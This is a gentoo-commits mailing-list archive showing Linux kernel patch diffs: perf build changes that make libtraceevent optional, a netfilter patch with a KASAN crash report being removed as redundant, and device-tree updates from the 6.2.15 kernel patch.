+index 2c96aa3cc1ec8..c220fec970324 100644
+--- a/tools/perf/util/scripting-engines/Build
++++ b/tools/perf/util/scripting-engines/Build
+@@ -1,7 +1,7 @@
+ ifeq ($(CONFIG_LIBTRACEEVENT),y)
+   perf-$(CONFIG_LIBPERL)   += trace-event-perl.o
+-  perf-$(CONFIG_LIBPYTHON) += trace-event-python.o
+ endif
++perf-$(CONFIG_LIBPYTHON) += trace-event-python.o
+ 
+ CFLAGS_trace-event-perl.o += $(PERL_EMBED_CCOPTS) -Wno-redundant-decls -Wno-strict-prototypes -Wno-unused-parameter -Wno-shadow -Wno-nested-externs -Wno-undef -Wno-switch-default -Wno-bad-function-cast -Wno-declaration-after-statement -Wno-switch-enum
+ 
+diff --git a/tools/perf/util/scripting-engines/trace-event-python.c b/tools/perf/util/scripting-engines/trace-event-python.c
+index e930f5f1f36d2..53c32b75c0cab 100644
+--- a/tools/perf/util/scripting-engines/trace-event-python.c
++++ b/tools/perf/util/scripting-engines/trace-event-python.c
+@@ -30,7 +30,9 @@
+ #include <linux/bitmap.h>
+ #include <linux/compiler.h>
+ #include <linux/time64.h>
++#ifdef HAVE_LIBTRACEEVENT
+ #include <traceevent/event-parse.h>
++#endif
+ 
+ #include "../build-id.h"
+ #include "../counts.h"
+@@ -87,18 +89,21 @@ PyMODINIT_FUNC initperf_trace_context(void);
+ PyMODINIT_FUNC PyInit_perf_trace_context(void);
+ #endif
+ 
++#ifdef HAVE_LIBTRACEEVENT
+ #define TRACE_EVENT_TYPE_MAX				\
+ 	((1 << (sizeof(unsigned short) * 8)) - 1)
+ 
+ static DECLARE_BITMAP(events_defined, TRACE_EVENT_TYPE_MAX);
+ 
+-#define MAX_FIELDS	64
+ #define N_COMMON_FIELDS	7
+ 
+-extern struct scripting_context *scripting_context;
+-
+ static char *cur_field_name;
+ static int zero_flag_atom;
++#endif
++
++#define MAX_FIELDS	64
++
++extern struct scripting_context *scripting_context;
+ 
+ static PyObject *main_module, *main_dict;
+ 
+@@ -153,6 +158,26 @@ static PyObject *get_handler(const char *handler_name)
+ 	return handler;
+ }
+ 
++static void call_object(PyObject *handler, PyObject *args, const char *die_msg)
++{
++	PyObject *retval;
++
++	retval = PyObject_CallObject(handler, args);
++	if (retval == NULL)
++		handler_call_die(die_msg);
++	Py_DECREF(retval);
++}
++
++static void try_call_object(const char *handler_name, PyObject *args)
++{
++	PyObject *handler;
++
++	handler = get_handler(handler_name);
++	if (handler)
++		call_object(handler, args, handler_name);
++}
++
++#ifdef HAVE_LIBTRACEEVENT
+ static int get_argument_count(PyObject *handler)
+ {
+ 	int arg_count = 0;
+@@ -181,25 +206,6 @@ static int get_argument_count(PyObject *handler)
+ 	return arg_count;
+ }
+ 
+-static void call_object(PyObject *handler, PyObject *args, const char *die_msg)
+-{
+-	PyObject *retval;
+-
+-	retval = PyObject_CallObject(handler, args);
+-	if (retval == NULL)
+-		handler_call_die(die_msg);
+-	Py_DECREF(retval);
+-}
+-
+-static void try_call_object(const char *handler_name, PyObject *args)
+-{
+-	PyObject *handler;
+-
+-	handler = get_handler(handler_name);
+-	if (handler)
+-		call_object(handler, args, handler_name);
+-}
+-
+ static void define_value(enum tep_print_arg_type field_type,
+ 			 const char *ev_name,
+ 			 const char *field_name,
+@@ -379,6 +385,7 @@ static PyObject *get_field_numeric_entry(struct tep_event *event,
+ 		obj = list;
+ 	return obj;
+ }
++#endif
+ 
+ static const char *get_dsoname(struct map *map)
+ {
+@@ -906,6 +913,7 @@ static PyObject *get_perf_sample_dict(struct perf_sample *sample,
+ 	return dict;
+ }
+ 
++#ifdef HAVE_LIBTRACEEVENT
+ static void python_process_tracepoint(struct perf_sample *sample,
+ 				      struct evsel *evsel,
+ 				      struct addr_location *al,
+@@ -1037,6 +1045,16 @@ static void python_process_tracepoint(struct perf_sample *sample,
+ 
+ 	Py_DECREF(t);
+ }
++#else
++static void python_process_tracepoint(struct perf_sample *sample __maybe_unused,
++				      struct evsel *evsel __maybe_unused,
++				      struct addr_location *al __maybe_unused,
++				      struct addr_location *addr_al __maybe_unused)
++{
++	fprintf(stderr, "Tracepoint events are not supported because "
++			"perf is not linked with libtraceevent.\n");
++}
++#endif
+ 
+ static PyObject *tuple_new(unsigned int sz)
+ {
+@@ -1967,6 +1985,7 @@ static int python_stop_script(void)
+ 	return 0;
+ }
+ 
++#ifdef HAVE_LIBTRACEEVENT
+ static int python_generate_script(struct tep_handle *pevent, const char *outfile)
+ {
+ 	int i, not_first, count, nr_events;
+@@ -2157,6 +2176,18 @@ static int python_generate_script(struct tep_handle *pevent, const char *outfile
+ 
+ 	return 0;
+ }
++#else
++static int python_generate_script(struct tep_handle *pevent __maybe_unused,
++				  const char *outfile __maybe_unused)
++{
++	fprintf(stderr, "Generating Python perf-script is not supported."
++		"  Install libtraceevent and rebuild perf to enable it.\n"
++		"For example:\n  # apt install libtraceevent-dev (ubuntu)"
++		"\n  # yum install libtraceevent-devel (Fedora)"
++		"\n  etc.\n");
++	return -1;
++}
++#endif
+ 
+ struct scripting_ops python_scripting_ops = {
+ 	.name			= "Python",
+diff --git a/tools/perf/util/sort.c b/tools/perf/util/sort.c
+index 37662cdec5eef..22808643ab725 100644
+--- a/tools/perf/util/sort.c
++++ b/tools/perf/util/sort.c
+@@ -603,12 +603,7 @@ static char *hist_entry__get_srcfile(struct hist_entry *e)
+ static int64_t
+ sort__srcfile_cmp(struct hist_entry *left, struct hist_entry *right)
+ {
+-	if (!left->srcfile)
+-		left->srcfile = hist_entry__get_srcfile(left);
+-	if (!right->srcfile)
+-		right->srcfile = hist_entry__get_srcfile(right);
+-
+-	return strcmp(right->srcfile, left->srcfile);
++	return sort__srcline_cmp(left, right);
+ }
+ 
+ static int64_t
+@@ -971,8 +966,7 @@ static int hist_entry__dso_to_filter(struct hist_entry *he, int type,
+ static int64_t
+ sort__sym_from_cmp(struct hist_entry *left, struct hist_entry *right)
+ {
+-	struct addr_map_symbol *from_l = &left->branch_info->from;
+-	struct addr_map_symbol *from_r = &right->branch_info->from;
++	struct addr_map_symbol *from_l, *from_r;
+ 
+ 	if (!left->branch_info || !right->branch_info)
+ 		return cmp_null(left->branch_info, right->branch_info);
+diff --git a/tools/perf/util/symbol-elf.c b/tools/perf/util/symbol-elf.c
+index 96767d1b3f1c2..714fd9d0b51ef 100644
+--- a/tools/perf/util/symbol-elf.c
++++ b/tools/perf/util/symbol-elf.c
+@@ -581,7 +581,7 @@ static int elf_read_build_id(Elf *elf, void *bf, size_t size)
+ 				size_t sz = min(size, descsz);
+ 				memcpy(bf, ptr, sz);
+ 				memset(bf + sz, 0, size - sz);
+-				err = descsz;
++				err = sz;
+ 				break;
+ 			}
+ 		}
+diff --git a/tools/perf/util/trace-event-scripting.c b/tools/perf/util/trace-event-scripting.c
+index 56175c53f9af7..bd0000300c774 100644
+--- a/tools/perf/util/trace-event-scripting.c
++++ b/tools/perf/util/trace-event-scripting.c
+@@ -9,7 +9,9 @@
+ #include <stdlib.h>
+ #include <string.h>
+ #include <errno.h>
++#ifdef HAVE_LIBTRACEEVENT
+ #include <traceevent/event-parse.h>
++#endif
+ 
+ #include "debug.h"
+ #include "trace-event.h"
+@@ -27,10 +29,11 @@ void scripting_context__update(struct scripting_context *c,
+ 			       struct addr_location *addr_al)
+ {
+ 	c->event_data = sample->raw_data;
++	c->pevent = NULL;
++#ifdef HAVE_LIBTRACEEVENT
+ 	if (evsel->tp_format)
+ 		c->pevent = evsel->tp_format->tep;
+-	else
+-		c->pevent = NULL;
++#endif
+ 	c->event = event;
+ 	c->sample = sample;
+ 	c->evsel = evsel;
+@@ -122,6 +125,7 @@ void setup_python_scripting(void)
+ }
+ #endif
+ 
++#ifdef HAVE_LIBTRACEEVENT
+ static void print_perl_unsupported_msg(void)
+ {
+ 	fprintf(stderr, "Perl scripting not supported."
+@@ -186,3 +190,4 @@ void setup_perl_scripting(void)
+ 	register_perl_scripting(&perl_scripting_ops);
+ }
+ #endif
++#endif
+diff --git a/tools/perf/util/tracepoint.c b/tools/perf/util/tracepoint.c
+index 89ef56c433110..92dd8b455b902 100644
+--- a/tools/perf/util/tracepoint.c
++++ b/tools/perf/util/tracepoint.c
+@@ -50,6 +50,7 @@ int is_valid_tracepoint(const char *event_string)
+ 				 sys_dirent->d_name, evt_dirent->d_name);
+ 			if (!strcmp(evt_path, event_string)) {
+ 				closedir(evt_dir);
++				put_events_file(dir_path);
+ 				closedir(sys_dir);
+ 				return 1;
+ 			}
+diff --git a/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh b/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
+index aebaab8ce44cb..441eededa0312 100755
+--- a/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
++++ b/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
+@@ -292,6 +292,11 @@ setup_hs()
+ 	ip netns exec ${hsname} sysctl -wq net.ipv6.conf.all.accept_dad=0
+ 	ip netns exec ${hsname} sysctl -wq net.ipv6.conf.default.accept_dad=0
+ 
++	# disable the rp_filter otherwise the kernel gets confused about how
++	# to route decap ipv4 packets.
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.default.rp_filter=0
++
+ 	ip -netns ${hsname} link add veth0 type veth peer name ${rtveth}
+ 	ip -netns ${hsname} link set ${rtveth} netns ${rtname}
+ 	ip -netns ${hsname} addr add ${IPv6_HS_NETWORK}::${hs}/64 dev veth0 nodad
+@@ -316,11 +321,6 @@ setup_hs()
+ 	ip netns exec ${rtname} sysctl -wq net.ipv6.conf.${rtveth}.proxy_ndp=1
+ 	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.proxy_arp=1
+ 
+-	# disable the rp_filter otherwise the kernel gets confused about how
+-	# to route decap ipv4 packets.
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.rp_filter=0
+-
+ 	ip netns exec ${rtname} sh -c "echo 1 > /proc/sys/net/vrf/strict_mode"
+ }
+ 
+diff --git a/tools/testing/selftests/netfilter/Makefile b/tools/testing/selftests/netfilter/Makefile
+index 4504ee07be08d..3686bfa6c58d7 100644
+--- a/tools/testing/selftests/netfilter/Makefile
++++ b/tools/testing/selftests/netfilter/Makefile
+@@ -8,8 +8,11 @@ TEST_PROGS := nft_trans_stress.sh nft_fib.sh nft_nat.sh bridge_brouter.sh \
+ 	ipip-conntrack-mtu.sh conntrack_tcp_unreplied.sh \
+ 	conntrack_vrf.sh nft_synproxy.sh rpath.sh
+ 
+-CFLAGS += $(shell pkg-config --cflags libmnl 2>/dev/null || echo "-I/usr/include/libmnl")
+-LDLIBS = -lmnl
++HOSTPKG_CONFIG := pkg-config
++
++CFLAGS += $(shell $(HOSTPKG_CONFIG) --cflags libmnl 2>/dev/null)
++LDLIBS += $(shell $(HOSTPKG_CONFIG) --libs libmnl 2>/dev/null || echo -lmnl)
++
+ TEST_GEN_FILES =  nf-queue connect_close
+ 
+ include ../lib.mk


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-05-11 16:11 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-05-11 16:11 UTC (permalink / raw
  To: gentoo-commits

commit:     c3f96c2db4d8b4e17d3da3137e70679513b988bb
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu May 11 16:11:16 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu May 11 16:11:16 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c3f96c2d

Remove redundant patch

Removed:
1520_nf-tables-make-deleted-anon-sets-inactive.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |   4 -
 ...nf-tables-make-deleted-anon-sets-inactive.patch | 121 ---------------------
 2 files changed, 125 deletions(-)

diff --git a/0000_README b/0000_README
index 025f8570..c1153b54 100644
--- a/0000_README
+++ b/0000_README
@@ -111,10 +111,6 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
-Patch:  1520_fs-enable-link-security-restrictions-by-default.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=c1592a89942e9678f7d9c8030efa777c0d57edab
-Desc:   netfilter: nf_tables: deactivate anonymous set from preparation phase
-
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1520_nf-tables-make-deleted-anon-sets-inactive.patch b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
deleted file mode 100644
index cd75de5c..00000000
--- a/1520_nf-tables-make-deleted-anon-sets-inactive.patch
+++ /dev/null
@@ -1,121 +0,0 @@
-From c1592a89942e9678f7d9c8030efa777c0d57edab Mon Sep 17 00:00:00 2001
-From: Pablo Neira Ayuso <pablo@netfilter.org>
-Date: Tue, 2 May 2023 10:25:24 +0200
-Subject: netfilter: nf_tables: deactivate anonymous set from preparation phase
-
-Toggle deleted anonymous sets as inactive in the next generation, so
-users cannot perform any update on it. Clear the generation bitmask
-in case the transaction is aborted.
-
-The following KASAN splat shows a set element deletion for a bound
-anonymous set that has been already removed in the same transaction.
-
-[   64.921510] ==================================================================
-[   64.923123] BUG: KASAN: wild-memory-access in nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.924745] Write of size 8 at addr dead000000000122 by task test/890
-[   64.927903] CPU: 3 PID: 890 Comm: test Not tainted 6.3.0+ #253
-[   64.931120] Call Trace:
-[   64.932699]  <TASK>
-[   64.934292]  dump_stack_lvl+0x33/0x50
-[   64.935908]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.937551]  kasan_report+0xda/0x120
-[   64.939186]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.940814]  nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.942452]  ? __kasan_slab_alloc+0x2d/0x60
-[   64.944070]  ? nf_tables_setelem_notify+0x190/0x190 [nf_tables]
-[   64.945710]  ? kasan_set_track+0x21/0x30
-[   64.947323]  nfnetlink_rcv_batch+0x709/0xd90 [nfnetlink]
-[   64.948898]  ? nfnetlink_rcv_msg+0x480/0x480 [nfnetlink]
-
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- include/net/netfilter/nf_tables.h |  1 +
- net/netfilter/nf_tables_api.c     | 12 ++++++++++++
- net/netfilter/nft_dynset.c        |  2 +-
- net/netfilter/nft_lookup.c        |  2 +-
- net/netfilter/nft_objref.c        |  2 +-
- 5 files changed, 16 insertions(+), 3 deletions(-)
-
-diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
-index 3ed21d2d56590..2e24ea1d744c2 100644
---- a/include/net/netfilter/nf_tables.h
-+++ b/include/net/netfilter/nf_tables.h
-@@ -619,6 +619,7 @@ struct nft_set_binding {
- };
- 
- enum nft_trans_phase;
-+void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
- void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
- 			      struct nft_set_binding *binding,
- 			      enum nft_trans_phase phase);
-diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
-index 8b6c61a2196cb..59fb8320ab4d7 100644
---- a/net/netfilter/nf_tables_api.c
-+++ b/net/netfilter/nf_tables_api.c
-@@ -5127,12 +5127,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
- 	}
- }
- 
-+void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
-+{
-+	if (nft_set_is_anonymous(set))
-+		nft_clear(ctx->net, set);
-+
-+	set->use++;
-+}
-+EXPORT_SYMBOL_GPL(nf_tables_activate_set);
-+
- void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
- 			      struct nft_set_binding *binding,
- 			      enum nft_trans_phase phase)
- {
- 	switch (phase) {
- 	case NFT_TRANS_PREPARE:
-+		if (nft_set_is_anonymous(set))
-+			nft_deactivate_next(ctx->net, set);
-+
- 		set->use--;
- 		return;
- 	case NFT_TRANS_ABORT:
-diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
-index 274579b1696e0..bd19c7aec92ee 100644
---- a/net/netfilter/nft_dynset.c
-+++ b/net/netfilter/nft_dynset.c
-@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_dynset *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_dynset_destroy(const struct nft_ctx *ctx,
-diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
-index cecf8ab90e58f..03ef4fdaa460b 100644
---- a/net/netfilter/nft_lookup.c
-+++ b/net/netfilter/nft_lookup.c
-@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_lookup *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_lookup_destroy(const struct nft_ctx *ctx,
-diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
-index cb37169608bab..a48dd5b5d45b1 100644
---- a/net/netfilter/nft_objref.c
-+++ b/net/netfilter/nft_objref.c
-@@ -185,7 +185,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_objref_map *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_objref_map_destroy(const struct nft_ctx *ctx,
--- 
-cgit 
-


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-05-11 14:48 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-05-11 14:48 UTC (permalink / raw
  To: gentoo-commits

commit:     eee10f955c1d2689f8bd7ec36ef5d1d76f6d355f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu May 11 14:48:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu May 11 14:48:39 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=eee10f95

Linux patch 6.2.15

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1014_linux-6.2.15.patch | 38097 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 38101 insertions(+)

diff --git a/0000_README b/0000_README
index a1325df7..025f8570 100644
--- a/0000_README
+++ b/0000_README
@@ -99,6 +99,10 @@ Patch:  1013_linux-6.2.14.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.14
 
+Patch:  1014_linux-6.2.15.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.15
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1014_linux-6.2.15.patch b/1014_linux-6.2.15.patch
new file mode 100644
index 00000000..030da015
--- /dev/null
+++ b/1014_linux-6.2.15.patch
@@ -0,0 +1,38097 @@
+diff --git a/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml b/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
+index 79c6f8da1319c..b0b95689d78b8 100644
+--- a/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
++++ b/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
+@@ -30,6 +30,7 @@ properties:
+     const: 0
+ 
+   clocks:
++    minItems: 3
+     maxItems: 5
+ 
+   clock-names:
+diff --git a/Makefile b/Makefile
+index 031d40ad0bd9d..9f535df81b033 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 14
++SUBLEVEL = 15
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/omap3-gta04.dtsi b/arch/arm/boot/dts/omap3-gta04.dtsi
+index 87e0ab1bbe957..e0be0fb23f80f 100644
+--- a/arch/arm/boot/dts/omap3-gta04.dtsi
++++ b/arch/arm/boot/dts/omap3-gta04.dtsi
+@@ -612,6 +612,22 @@
+ 	clock-frequency = <100000>;
+ };
+ 
++&mcspi1 {
++	status = "disabled";
++};
++
++&mcspi2 {
++	status = "disabled";
++};
++
++&mcspi3 {
++	status = "disabled";
++};
++
++&mcspi4 {
++	status = "disabled";
++};
++
+ &usb_otg_hs {
+ 	interface-type = <0>;
+ 	usb-phy = <&usb2_phy>;
+diff --git a/arch/arm/boot/dts/qcom-apq8064.dtsi b/arch/arm/boot/dts/qcom-apq8064.dtsi
+index 0da9623ea0849..4133321edad88 100644
+--- a/arch/arm/boot/dts/qcom-apq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-apq8064.dtsi
+@@ -1261,7 +1261,7 @@
+ 			gpu_opp_table: opp-table {
+ 				compatible = "operating-points-v2";
+ 
+-				opp-320000000 {
++				opp-450000000 {
+ 					opp-hz = /bits/ 64 <450000000>;
+ 				};
+ 
+diff --git a/arch/arm/boot/dts/qcom-ipq4019.dtsi b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+index acb08dcf94428..a89a17278a118 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+@@ -426,8 +426,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x40200000 0x40200000 0 0x00100000>,
+-				 <0x82000000 0 0x40300000 0x40300000 0 0x00d00000>;
++			ranges = <0x81000000 0x0 0x00000000 0x40200000 0x0 0x00100000>,
++				 <0x82000000 0x0 0x40300000 0x40300000 0x0 0x00d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm/boot/dts/qcom-ipq8064.dtsi b/arch/arm/boot/dts/qcom-ipq8064.dtsi
+index 7e784b0995da2..1e6eb6773a0b0 100644
+--- a/arch/arm/boot/dts/qcom-ipq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq8064.dtsi
+@@ -1082,8 +1082,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x0fe00000 0x0fe00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x08000000 0x08000000 0 0x07e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x0fe00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x08000000 0x08000000 0x0 0x07e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 35 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1133,8 +1133,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x31e00000 0x31e00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x2e000000 0x2e000000 0 0x03e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x31e00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x2e000000 0x2e000000 0x0 0x03e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 57 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1184,8 +1184,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x35e00000 0x35e00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x32000000 0x32000000 0 0x03e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x35e00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x32000000 0x32000000 0x0 0x03e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 71 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm/boot/dts/qcom-sdx55.dtsi b/arch/arm/boot/dts/qcom-sdx55.dtsi
+index 93d71aff3fab7..e84ca795cae65 100644
+--- a/arch/arm/boot/dts/qcom-sdx55.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx55.dtsi
+@@ -303,6 +303,45 @@
+ 			status = "disabled";
+ 		};
+ 
++		pcie_ep: pcie-ep@1c00000 {
++			compatible = "qcom,sdx55-pcie-ep";
++			reg = <0x01c00000 0x3000>,
++			      <0x40000000 0xf1d>,
++			      <0x40000f20 0xc8>,
++			      <0x40001000 0x1000>,
++			      <0x40200000 0x100000>,
++			      <0x01c03000 0x3000>;
++			reg-names = "parf", "dbi", "elbi", "atu", "addr_space",
++				    "mmio";
++
++			qcom,perst-regs = <&tcsr 0xb258 0xb270>;
++
++			clocks = <&gcc GCC_PCIE_AUX_CLK>,
++				 <&gcc GCC_PCIE_CFG_AHB_CLK>,
++				 <&gcc GCC_PCIE_MSTR_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLV_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLV_Q2A_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLEEP_CLK>,
++				 <&gcc GCC_PCIE_0_CLKREF_CLK>;
++			clock-names = "aux", "cfg", "bus_master", "bus_slave",
++				      "slave_q2a", "sleep", "ref";
++
++			interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 145 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "global", "doorbell";
++			reset-gpios = <&tlmm 57 GPIO_ACTIVE_LOW>;
++			wake-gpios = <&tlmm 53 GPIO_ACTIVE_LOW>;
++			resets = <&gcc GCC_PCIE_BCR>;
++			reset-names = "core";
++			power-domains = <&gcc PCIE_GDSC>;
++			phys = <&pcie0_lane>;
++			phy-names = "pciephy";
++			max-link-speed = <3>;
++			num-lanes = <2>;
++
++			status = "disabled";
++		};
++
+ 		pcie0_phy: phy@1c07000 {
+ 			compatible = "qcom,sdx55-qmp-pcie-phy";
+ 			reg = <0x01c07000 0x1c4>;
+@@ -400,45 +439,6 @@
+ 			status = "disabled";
+ 		};
+ 
+-		pcie_ep: pcie-ep@40000000 {
+-			compatible = "qcom,sdx55-pcie-ep";
+-			reg = <0x01c00000 0x3000>,
+-			      <0x40000000 0xf1d>,
+-			      <0x40000f20 0xc8>,
+-			      <0x40001000 0x1000>,
+-			      <0x40200000 0x100000>,
+-			      <0x01c03000 0x3000>;
+-			reg-names = "parf", "dbi", "elbi", "atu", "addr_space",
+-				    "mmio";
+-
+-			qcom,perst-regs = <&tcsr 0xb258 0xb270>;
+-
+-			clocks = <&gcc GCC_PCIE_AUX_CLK>,
+-				 <&gcc GCC_PCIE_CFG_AHB_CLK>,
+-				 <&gcc GCC_PCIE_MSTR_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLV_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLV_Q2A_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLEEP_CLK>,
+-				 <&gcc GCC_PCIE_0_CLKREF_CLK>;
+-			clock-names = "aux", "cfg", "bus_master", "bus_slave",
+-				      "slave_q2a", "sleep", "ref";
+-
+-			interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 145 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "global", "doorbell";
+-			reset-gpios = <&tlmm 57 GPIO_ACTIVE_LOW>;
+-			wake-gpios = <&tlmm 53 GPIO_ACTIVE_LOW>;
+-			resets = <&gcc GCC_PCIE_BCR>;
+-			reset-names = "core";
+-			power-domains = <&gcc PCIE_GDSC>;
+-			phys = <&pcie0_lane>;
+-			phy-names = "pciephy";
+-			max-link-speed = <3>;
+-			num-lanes = <2>;
+-
+-			status = "disabled";
+-		};
+-
+ 		remoteproc_mpss: remoteproc@4080000 {
+ 			compatible = "qcom,sdx55-mpss-pas";
+ 			reg = <0x04080000 0x4040>;
+diff --git a/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi b/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
+index a9d2bec990141..e15a3b2a9b399 100644
+--- a/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
++++ b/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
+@@ -1880,6 +1880,21 @@
+ 		};
+ 	};
+ 
++	spi1_pins_b: spi1-1 {
++		pins1 {
++			pinmux = <STM32_PINMUX('A', 5, AF5)>, /* SPI1_SCK */
++				 <STM32_PINMUX('B', 5, AF5)>; /* SPI1_MOSI */
++			bias-disable;
++			drive-push-pull;
++			slew-rate = <1>;
++		};
++
++		pins2 {
++			pinmux = <STM32_PINMUX('A', 6, AF5)>; /* SPI1_MISO */
++			bias-disable;
++		};
++	};
++
+ 	spi2_pins_a: spi2-0 {
+ 		pins1 {
+ 			pinmux = <STM32_PINMUX('B', 10, AF5)>, /* SPI2_SCK */
